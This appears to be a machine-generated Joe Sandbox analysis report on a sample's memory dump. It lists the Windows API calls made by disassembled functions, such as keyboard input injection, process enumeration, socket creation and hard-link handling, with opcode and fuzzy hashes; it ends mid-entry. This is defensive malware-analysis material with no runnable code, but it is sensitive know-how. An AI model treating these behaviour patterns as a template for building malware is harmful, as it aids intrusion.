          • Part of subcall function 00242DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00242DC5
          • Part of subcall function 00242DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00242DD6
          • Part of subcall function 00242DA7: GetCurrentThreadId.KERNEL32 ref: 00242DDD
          • Part of subcall function 00242DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00242DE4
        • GetFocus.USER32 ref: 00242F78
          • Part of subcall function 00242DEE: GetParent.USER32(00000000), ref: 00242DF9
        • GetClassNameW.USER32(?,?,00000100), ref: 00242FC3
        • EnumChildWindows.USER32(?,0024303B), ref: 00242FEB
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
        • String ID: %s%d
        • API String ID: 1272988791-1110647743
        • Opcode ID: 5f64f3ec26c0016a74378e446dcaaaa3432c14323496ca61e94f8276420b920a
        • Instruction ID: eefa98216423f46a3bbe0046b6ffefc6a9edccd93ca5673d0b921ea86c14b878
        • Opcode Fuzzy Hash: 5f64f3ec26c0016a74378e446dcaaaa3432c14323496ca61e94f8276420b920a
        • Instruction Fuzzy Hash: AE11E471710205ABCF08BF719CC6EEE37AAAF94314F044079F9099B152DF7099598F60
        APIs
        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002758C1
        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002758EE
        • DrawMenuBar.USER32(?), ref: 002758FD
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Menu$InfoItem$Draw
        • String ID: 0
        • API String ID: 3227129158-4108050209
        • Opcode ID: d4929a6a1b2ef9949cc6fec460dcf77f476c9b5dbfe744436bea5b98821cf389
        • Instruction ID: b30aeeb71f5aedf3c75ac2c537dab1114e32c15d6dd199f8b72b58ac9f44b13a
        • Opcode Fuzzy Hash: d4929a6a1b2ef9949cc6fec460dcf77f476c9b5dbfe744436bea5b98821cf389
        • Instruction Fuzzy Hash: 25016D31510229EFDB219F21EC48BAEBBB4FF45360F10C099E94DE6151DBB18A94DF61
        APIs
        • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0023D3BF
        • FreeLibrary.KERNEL32 ref: 0023D3E5
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: AddressFreeLibraryProc
        • String ID: GetSystemWow64DirectoryW$X64
        • API String ID: 3013587201-2590602151
        • Opcode ID: dc259f4cbbb494e90cd547052a16e3503b0172a35200c7de05a446b18b4bf7bd
        • Instruction ID: 389601f6fc1f4cb1bdbd8e8fbc89fb5b866a1cc452eb2dad1e11926623df0e08
        • Opcode Fuzzy Hash: dc259f4cbbb494e90cd547052a16e3503b0172a35200c7de05a446b18b4bf7bd
        • Instruction Fuzzy Hash: B4F05CF183162287D3750A306C18AAA33249F00701FA484ADFC09E2006DB70CDB08A92
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b207000b89ba0f4c3a060addace7bfd41fc52ddc02fea898efd623f71c14c45c
        • Instruction ID: d094c95c6f6bef0bf2690fd7ec80a0e045ed9dae6804b49d68f62ba173feb598
        • Opcode Fuzzy Hash: b207000b89ba0f4c3a060addace7bfd41fc52ddc02fea898efd623f71c14c45c
        • Instruction Fuzzy Hash: 53C15D75A10206EFDB18CFA4C894EAEBBB5FF48704F108598E905EB251D771ED91CB90
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Variant$ClearInitInitializeUninitialize
        • String ID:
        • API String ID: 1998397398-0
        • Opcode ID: 2ca8addb6fdb7277e5327eef984b11aaf654139a3011b9d1b006488517cb8128
        • Instruction ID: 8bf4a9dbc3d985486bf6344dbc05b9cd46597bf76c3bfcb566b3c91ab22bd2fc
        • Opcode Fuzzy Hash: 2ca8addb6fdb7277e5327eef984b11aaf654139a3011b9d1b006488517cb8128
        • Instruction Fuzzy Hash: 78A146752147019FD700DF29D885A2AB7E5FF88314F04885DF98A9B3A2DB30EE41CB92
        APIs
        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0027FC08,?), ref: 002405F0
        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0027FC08,?), ref: 00240608
        • CLSIDFromProgID.OLE32(?,?,00000000,0027CC40,000000FF,?,00000000,00000800,00000000,?,0027FC08,?), ref: 0024062D
        • _memcmp.LIBVCRUNTIME ref: 0024064E
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: FromProg$FreeTask_memcmp
        • String ID:
        • API String ID: 314563124-0
        • Opcode ID: 6a5f9ef03c5c3f422724b6be5ff88072c347b6b2ebbc3304418f7b27327a174c
        • Instruction ID: 5cca81ca264c3a346f828425034b5afd4f9a25ee0fe76f56dfe36b2958221a8e
        • Opcode Fuzzy Hash: 6a5f9ef03c5c3f422724b6be5ff88072c347b6b2ebbc3304418f7b27327a174c
        • Instruction Fuzzy Hash: FB814C71A1010AEFCB04DF94C984EEEB7B9FF89315F204558E606AB250DB71AE46CF60
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _free
        • String ID:
        • API String ID: 269201875-0
        • Opcode ID: ef0c34a6d987fdf1a16ed38f07dea4412fced34c1372494447b89c44af38ab8e
        • Instruction ID: 4716a2fdeb2cf9461426e2a633264a11e73e60b4de9c54372b7ccb6c59cd7c8d
        • Opcode Fuzzy Hash: ef0c34a6d987fdf1a16ed38f07dea4412fced34c1372494447b89c44af38ab8e
        • Instruction Fuzzy Hash: 1C412C31570225BADB217EF8AC46EAE3AA4EF61330F144266F81C96192D67448B19A61
        APIs
        • GetWindowRect.USER32(?,?), ref: 002762E2
        • ScreenToClient.USER32(?,?), ref: 00276315
        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00276382
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$ClientMoveRectScreen
        • String ID:
        • API String ID: 3880355969-0
        • Opcode ID: b7d116cec8eeb78eed7c32ee4f2efb2c5f4d315e8c3dae55b76e15107f2951fd
        • Instruction ID: 631e006af55d018cbd8e20a834753d68ea8c754337cdde1089b4cbec3c41320a
        • Opcode Fuzzy Hash: b7d116cec8eeb78eed7c32ee4f2efb2c5f4d315e8c3dae55b76e15107f2951fd
        • Instruction Fuzzy Hash: 19515E70A1064AEFCF14DF64D8889AE7BB6FF45760F108299F81997290D730EDA1CB90
        APIs
        • socket.WSOCK32(00000002,00000002,00000011), ref: 00261AFD
        • WSAGetLastError.WSOCK32 ref: 00261B0B
        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00261B8A
        • WSAGetLastError.WSOCK32 ref: 00261B94
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorLast$socket
        • String ID:
        • API String ID: 1881357543-0
        • Opcode ID: fb8c6d5dee5c3c54047390bb048dccd9f3a1e427499d5aa243e154804090cb87
        • Instruction ID: ec71ebe4ac7ce847db45883d66a3ba733fdc6cb2452e2f778a820ed1488322c5
        • Opcode Fuzzy Hash: fb8c6d5dee5c3c54047390bb048dccd9f3a1e427499d5aa243e154804090cb87
        • Instruction Fuzzy Hash: 6441A434600601AFE7209F24D886F2977E5AB54718F58845CF61A9F3D3D771ED928B90
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d2823eebda2c328939016dad78d9fe7f267472a36ba145a85381ed7ac4250e7d
        • Instruction ID: 91e98ebe4e1509588bb3ff2d2a4066419512987e4c76872b0ff15f44f2ab68d5
        • Opcode Fuzzy Hash: d2823eebda2c328939016dad78d9fe7f267472a36ba145a85381ed7ac4250e7d
        • Instruction Fuzzy Hash: 13412A71A20314BFD7259F78CC41BAABBF9EB98710F10852EF501DB6C2D37199A18B80
        APIs
        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00255783
        • GetLastError.KERNEL32(?,00000000), ref: 002557A9
        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002557CE
        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002557FA
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CreateHardLink$DeleteErrorFileLast
        • String ID:
        • API String ID: 3321077145-0
        • Opcode ID: 594d00ae16579497e87b90388a2a02373c94bac6263c27a32f9e1c5dec7cdf47
        • Instruction ID: d63dc7b91918bca2af0920c2a15369d1aa1bc3fb36fed1d7ca89e48169d9bf45
        • Opcode Fuzzy Hash: 594d00ae16579497e87b90388a2a02373c94bac6263c27a32f9e1c5dec7cdf47
        • Instruction Fuzzy Hash: E7412C35600A51DFCB11DF15D444A1EBBE2EF99321B198488EC4AAB362CB30FD45CB91
        APIs
        • MultiByteToWideChar.KERNEL32(?,00000000,?,00206D71,00000000,00000000,002082D9,?,002082D9,?,00000001,00206D71,?,00000001,002082D9,002082D9), ref: 0021D910
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0021D999
        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0021D9AB
        • __freea.LIBCMT ref: 0021D9B4
          • Part of subcall function 00213820: RtlAllocateHeap.NTDLL(00000000,?,?,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00213852
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
        • String ID:
        • API String ID: 2652629310-0
        • Opcode ID: ef496cddcee78601cc6e2af2f147df64419d78f1f2ef111eff453bc69aff3341
        • Instruction ID: 873750c58c3b3904cab41a1e8af7ee810f167638cdb96d9deb64956f19abb318
        • Opcode Fuzzy Hash: ef496cddcee78601cc6e2af2f147df64419d78f1f2ef111eff453bc69aff3341
        • Instruction Fuzzy Hash: 9B31AD72A2020AEBDB249F64DC45EEE7BE5EB50310B154169FC08D6291EB35DDA4CBA0
        APIs
        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00275352
        • GetWindowLongW.USER32(?,000000F0), ref: 00275375
        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00275382
        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002753A8
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: LongWindow$InvalidateMessageRectSend
        • String ID:
        • API String ID: 3340791633-0
        • Opcode ID: d2780a66ee8b5eed7f27987210fa70269bd2285a1bedeadd8979fbc3762e7056
        • Instruction ID: 4898419d34dade9baa57abdd86211c876962ea792b59e9c377f64793c053df53
        • Opcode Fuzzy Hash: d2780a66ee8b5eed7f27987210fa70269bd2285a1bedeadd8979fbc3762e7056
        • Instruction Fuzzy Hash: 5C313730A75A2DEFEB349E24CC46FE9B765AB04390F54C181FA08921F0C3F0ADA09B41
        APIs
        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0024ABF1
        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0024AC0D
        • PostMessageW.USER32(00000000,00000101,00000000), ref: 0024AC74
        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0024ACC6
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: KeyboardState$InputMessagePostSend
        • String ID:
        • API String ID: 432972143-0
        • Opcode ID: b1af08fc75631674077ef0dbf180e547f1173fc473b6e60e9efbefb7dc8928eb
        • Instruction ID: d0c540a1526c6ba68dcf584fd338297ca24bc05899123ca6f8473ff20b32ea0c
        • Opcode Fuzzy Hash: b1af08fc75631674077ef0dbf180e547f1173fc473b6e60e9efbefb7dc8928eb
        • Instruction Fuzzy Hash: 57313930AA071A6FEF3DCF64CC887FA7BA5AB89310F04431BE485571D0C37589A18792
        APIs
        • ClientToScreen.USER32(?,?), ref: 0027769A
        • GetWindowRect.USER32(?,?), ref: 00277710
        • PtInRect.USER32(?,?,00278B89), ref: 00277720
        • MessageBeep.USER32(00000000), ref: 0027778C
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Rect$BeepClientMessageScreenWindow
        • String ID:
        • API String ID: 1352109105-0
        • Opcode ID: 0db3aae52f791fedb8fec428c1ea09603da67a0c8efa2c2b6a59862b641f9fef
        • Instruction ID: 38ccef1b2aad87a531d6e506611abba0bc552ebbfe4cbd56a927eb8959ddf489
        • Opcode Fuzzy Hash: 0db3aae52f791fedb8fec428c1ea09603da67a0c8efa2c2b6a59862b641f9fef
        • Instruction Fuzzy Hash: 7D41AB34A15655EFCB09CF68D899EA9B7F5FB48304F54C1A8E8189B261C330A9A1CF90
        APIs
        • GetForegroundWindow.USER32 ref: 002716EB
          • Part of subcall function 00243A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00243A57
          • Part of subcall function 00243A3D: GetCurrentThreadId.KERNEL32 ref: 00243A5E
          • Part of subcall function 00243A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002425B3), ref: 00243A65
        • GetCaretPos.USER32(?), ref: 002716FF
        • ClientToScreen.USER32(00000000,?), ref: 0027174C
        • GetForegroundWindow.USER32 ref: 00271752
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
        • String ID:
        • API String ID: 2759813231-0
        • Opcode ID: f67ae44eab5bb603e1c61e5e8f3b01abe56441993bd6093d947aee6c1d7d30f2
        • Instruction ID: 876c66c1ac50775e36bee5330bf911dcd945a8952fa6d2d9ac1957ba69f7d7fd
        • Opcode Fuzzy Hash: f67ae44eab5bb603e1c61e5e8f3b01abe56441993bd6093d947aee6c1d7d30f2
        • Instruction Fuzzy Hash: 90316171D10149AFCB04EFAAC881CAEF7F9EF58304B508069E415E7251D7319E45CBA0
        APIs
        • CreateToolhelp32Snapshot.KERNEL32 ref: 0024D501
        • Process32FirstW.KERNEL32(00000000,?), ref: 0024D50F
        • Process32NextW.KERNEL32(00000000,?), ref: 0024D52F
        • CloseHandle.KERNEL32(00000000), ref: 0024D5DC
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
        • String ID:
        • API String ID: 420147892-0
        • Opcode ID: c3656b4674ef86febc351d8a5969cf31f3e4850f9378b119cd5e1dd74e98e458
        • Instruction ID: cced23dfb6fd971c48cbf1ebcd151e687407e6adaf744d0119bf821f1185b5b2
        • Opcode Fuzzy Hash: c3656b4674ef86febc351d8a5969cf31f3e4850f9378b119cd5e1dd74e98e458
        • Instruction Fuzzy Hash: 6431C2711083419FD304EF64D885EAFBBF8EFA9344F90092DF585871A2EB719984CB92
        APIs
          • Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2
        • GetCursorPos.USER32(?), ref: 00279001
        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00237711,?,?,?,?,?), ref: 00279016
        • GetCursorPos.USER32(?), ref: 0027905E
        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00237711,?,?,?), ref: 00279094
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Cursor$LongMenuPopupProcTrackWindow
        • String ID:
        • API String ID: 2864067406-0
        • Opcode ID: b1f7b071676275b8bca714f611d39c5ae6601370eeda3395d93371a7988da540
        • Instruction ID: f7747360c2ad120fb25952daffd8fe5d06504635264f4202a32e637601739cc9
        • Opcode Fuzzy Hash: b1f7b071676275b8bca714f611d39c5ae6601370eeda3395d93371a7988da540
        • Instruction Fuzzy Hash: 4021BF35620118EFDB258FA4D859EFA3BF9FB89350F508169F90957261C33199A0DB60
        APIs
        • GetFileAttributesW.KERNEL32(?,0027CB68), ref: 0024D2FB
        • GetLastError.KERNEL32 ref: 0024D30A
        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0024D319
        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0027CB68), ref: 0024D376
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
